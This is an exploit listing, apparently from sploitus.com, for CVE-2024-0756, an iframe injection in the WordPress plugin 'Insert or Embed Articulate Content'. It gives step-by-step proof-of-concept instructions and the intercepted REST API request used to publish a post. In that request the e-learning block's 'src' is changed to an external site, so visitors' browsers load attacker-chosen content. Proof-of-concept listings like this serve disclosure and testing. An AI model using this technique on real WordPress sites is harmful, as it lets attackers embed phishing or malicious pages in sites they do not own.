Exploit for Insert or Embed Articulate Content into WordPress <= 4.3000000023 - Iframe Injection CVE-2024-0756

Name: Exploit for Insert or Embed Articulate Content into WordPress <= 4.3000000023 - Iframe Injection CVE-2024-0756
Rating: 5 (107 reviews)

2024-05-14 | CVSS 5.4

## https://sploitus.com/exploit?id=WPEX-ID:9130A42D-FCA3-4F9C-AB97-D5E0A7A5CEF2
1) Create a new post
2) Add and e-Learning block and upload a zip file
3) Select the "Insert As: Iframe" option
4) Intercept the request to create a new post and in the body:

```
POST /index.php?rest_route=%2Fwp%2Fv2%2Fposts%2F236&_locale=user HTTP/2

{"id":236,"content":"<!-- wp:e-learning/block {\"src\":\"/wp-content/uploads/articulate_uploads/__ARCHIVE_NAME__/main.html\",\"href\":\"/wp-content/uploads/articulate_uploads/__ARCHIVE_NAME__/main.html\"} /-->","status":"publish"}
```

change the `src` to a URL of an external site.
5) Open the new post and see that it loads the content from the original source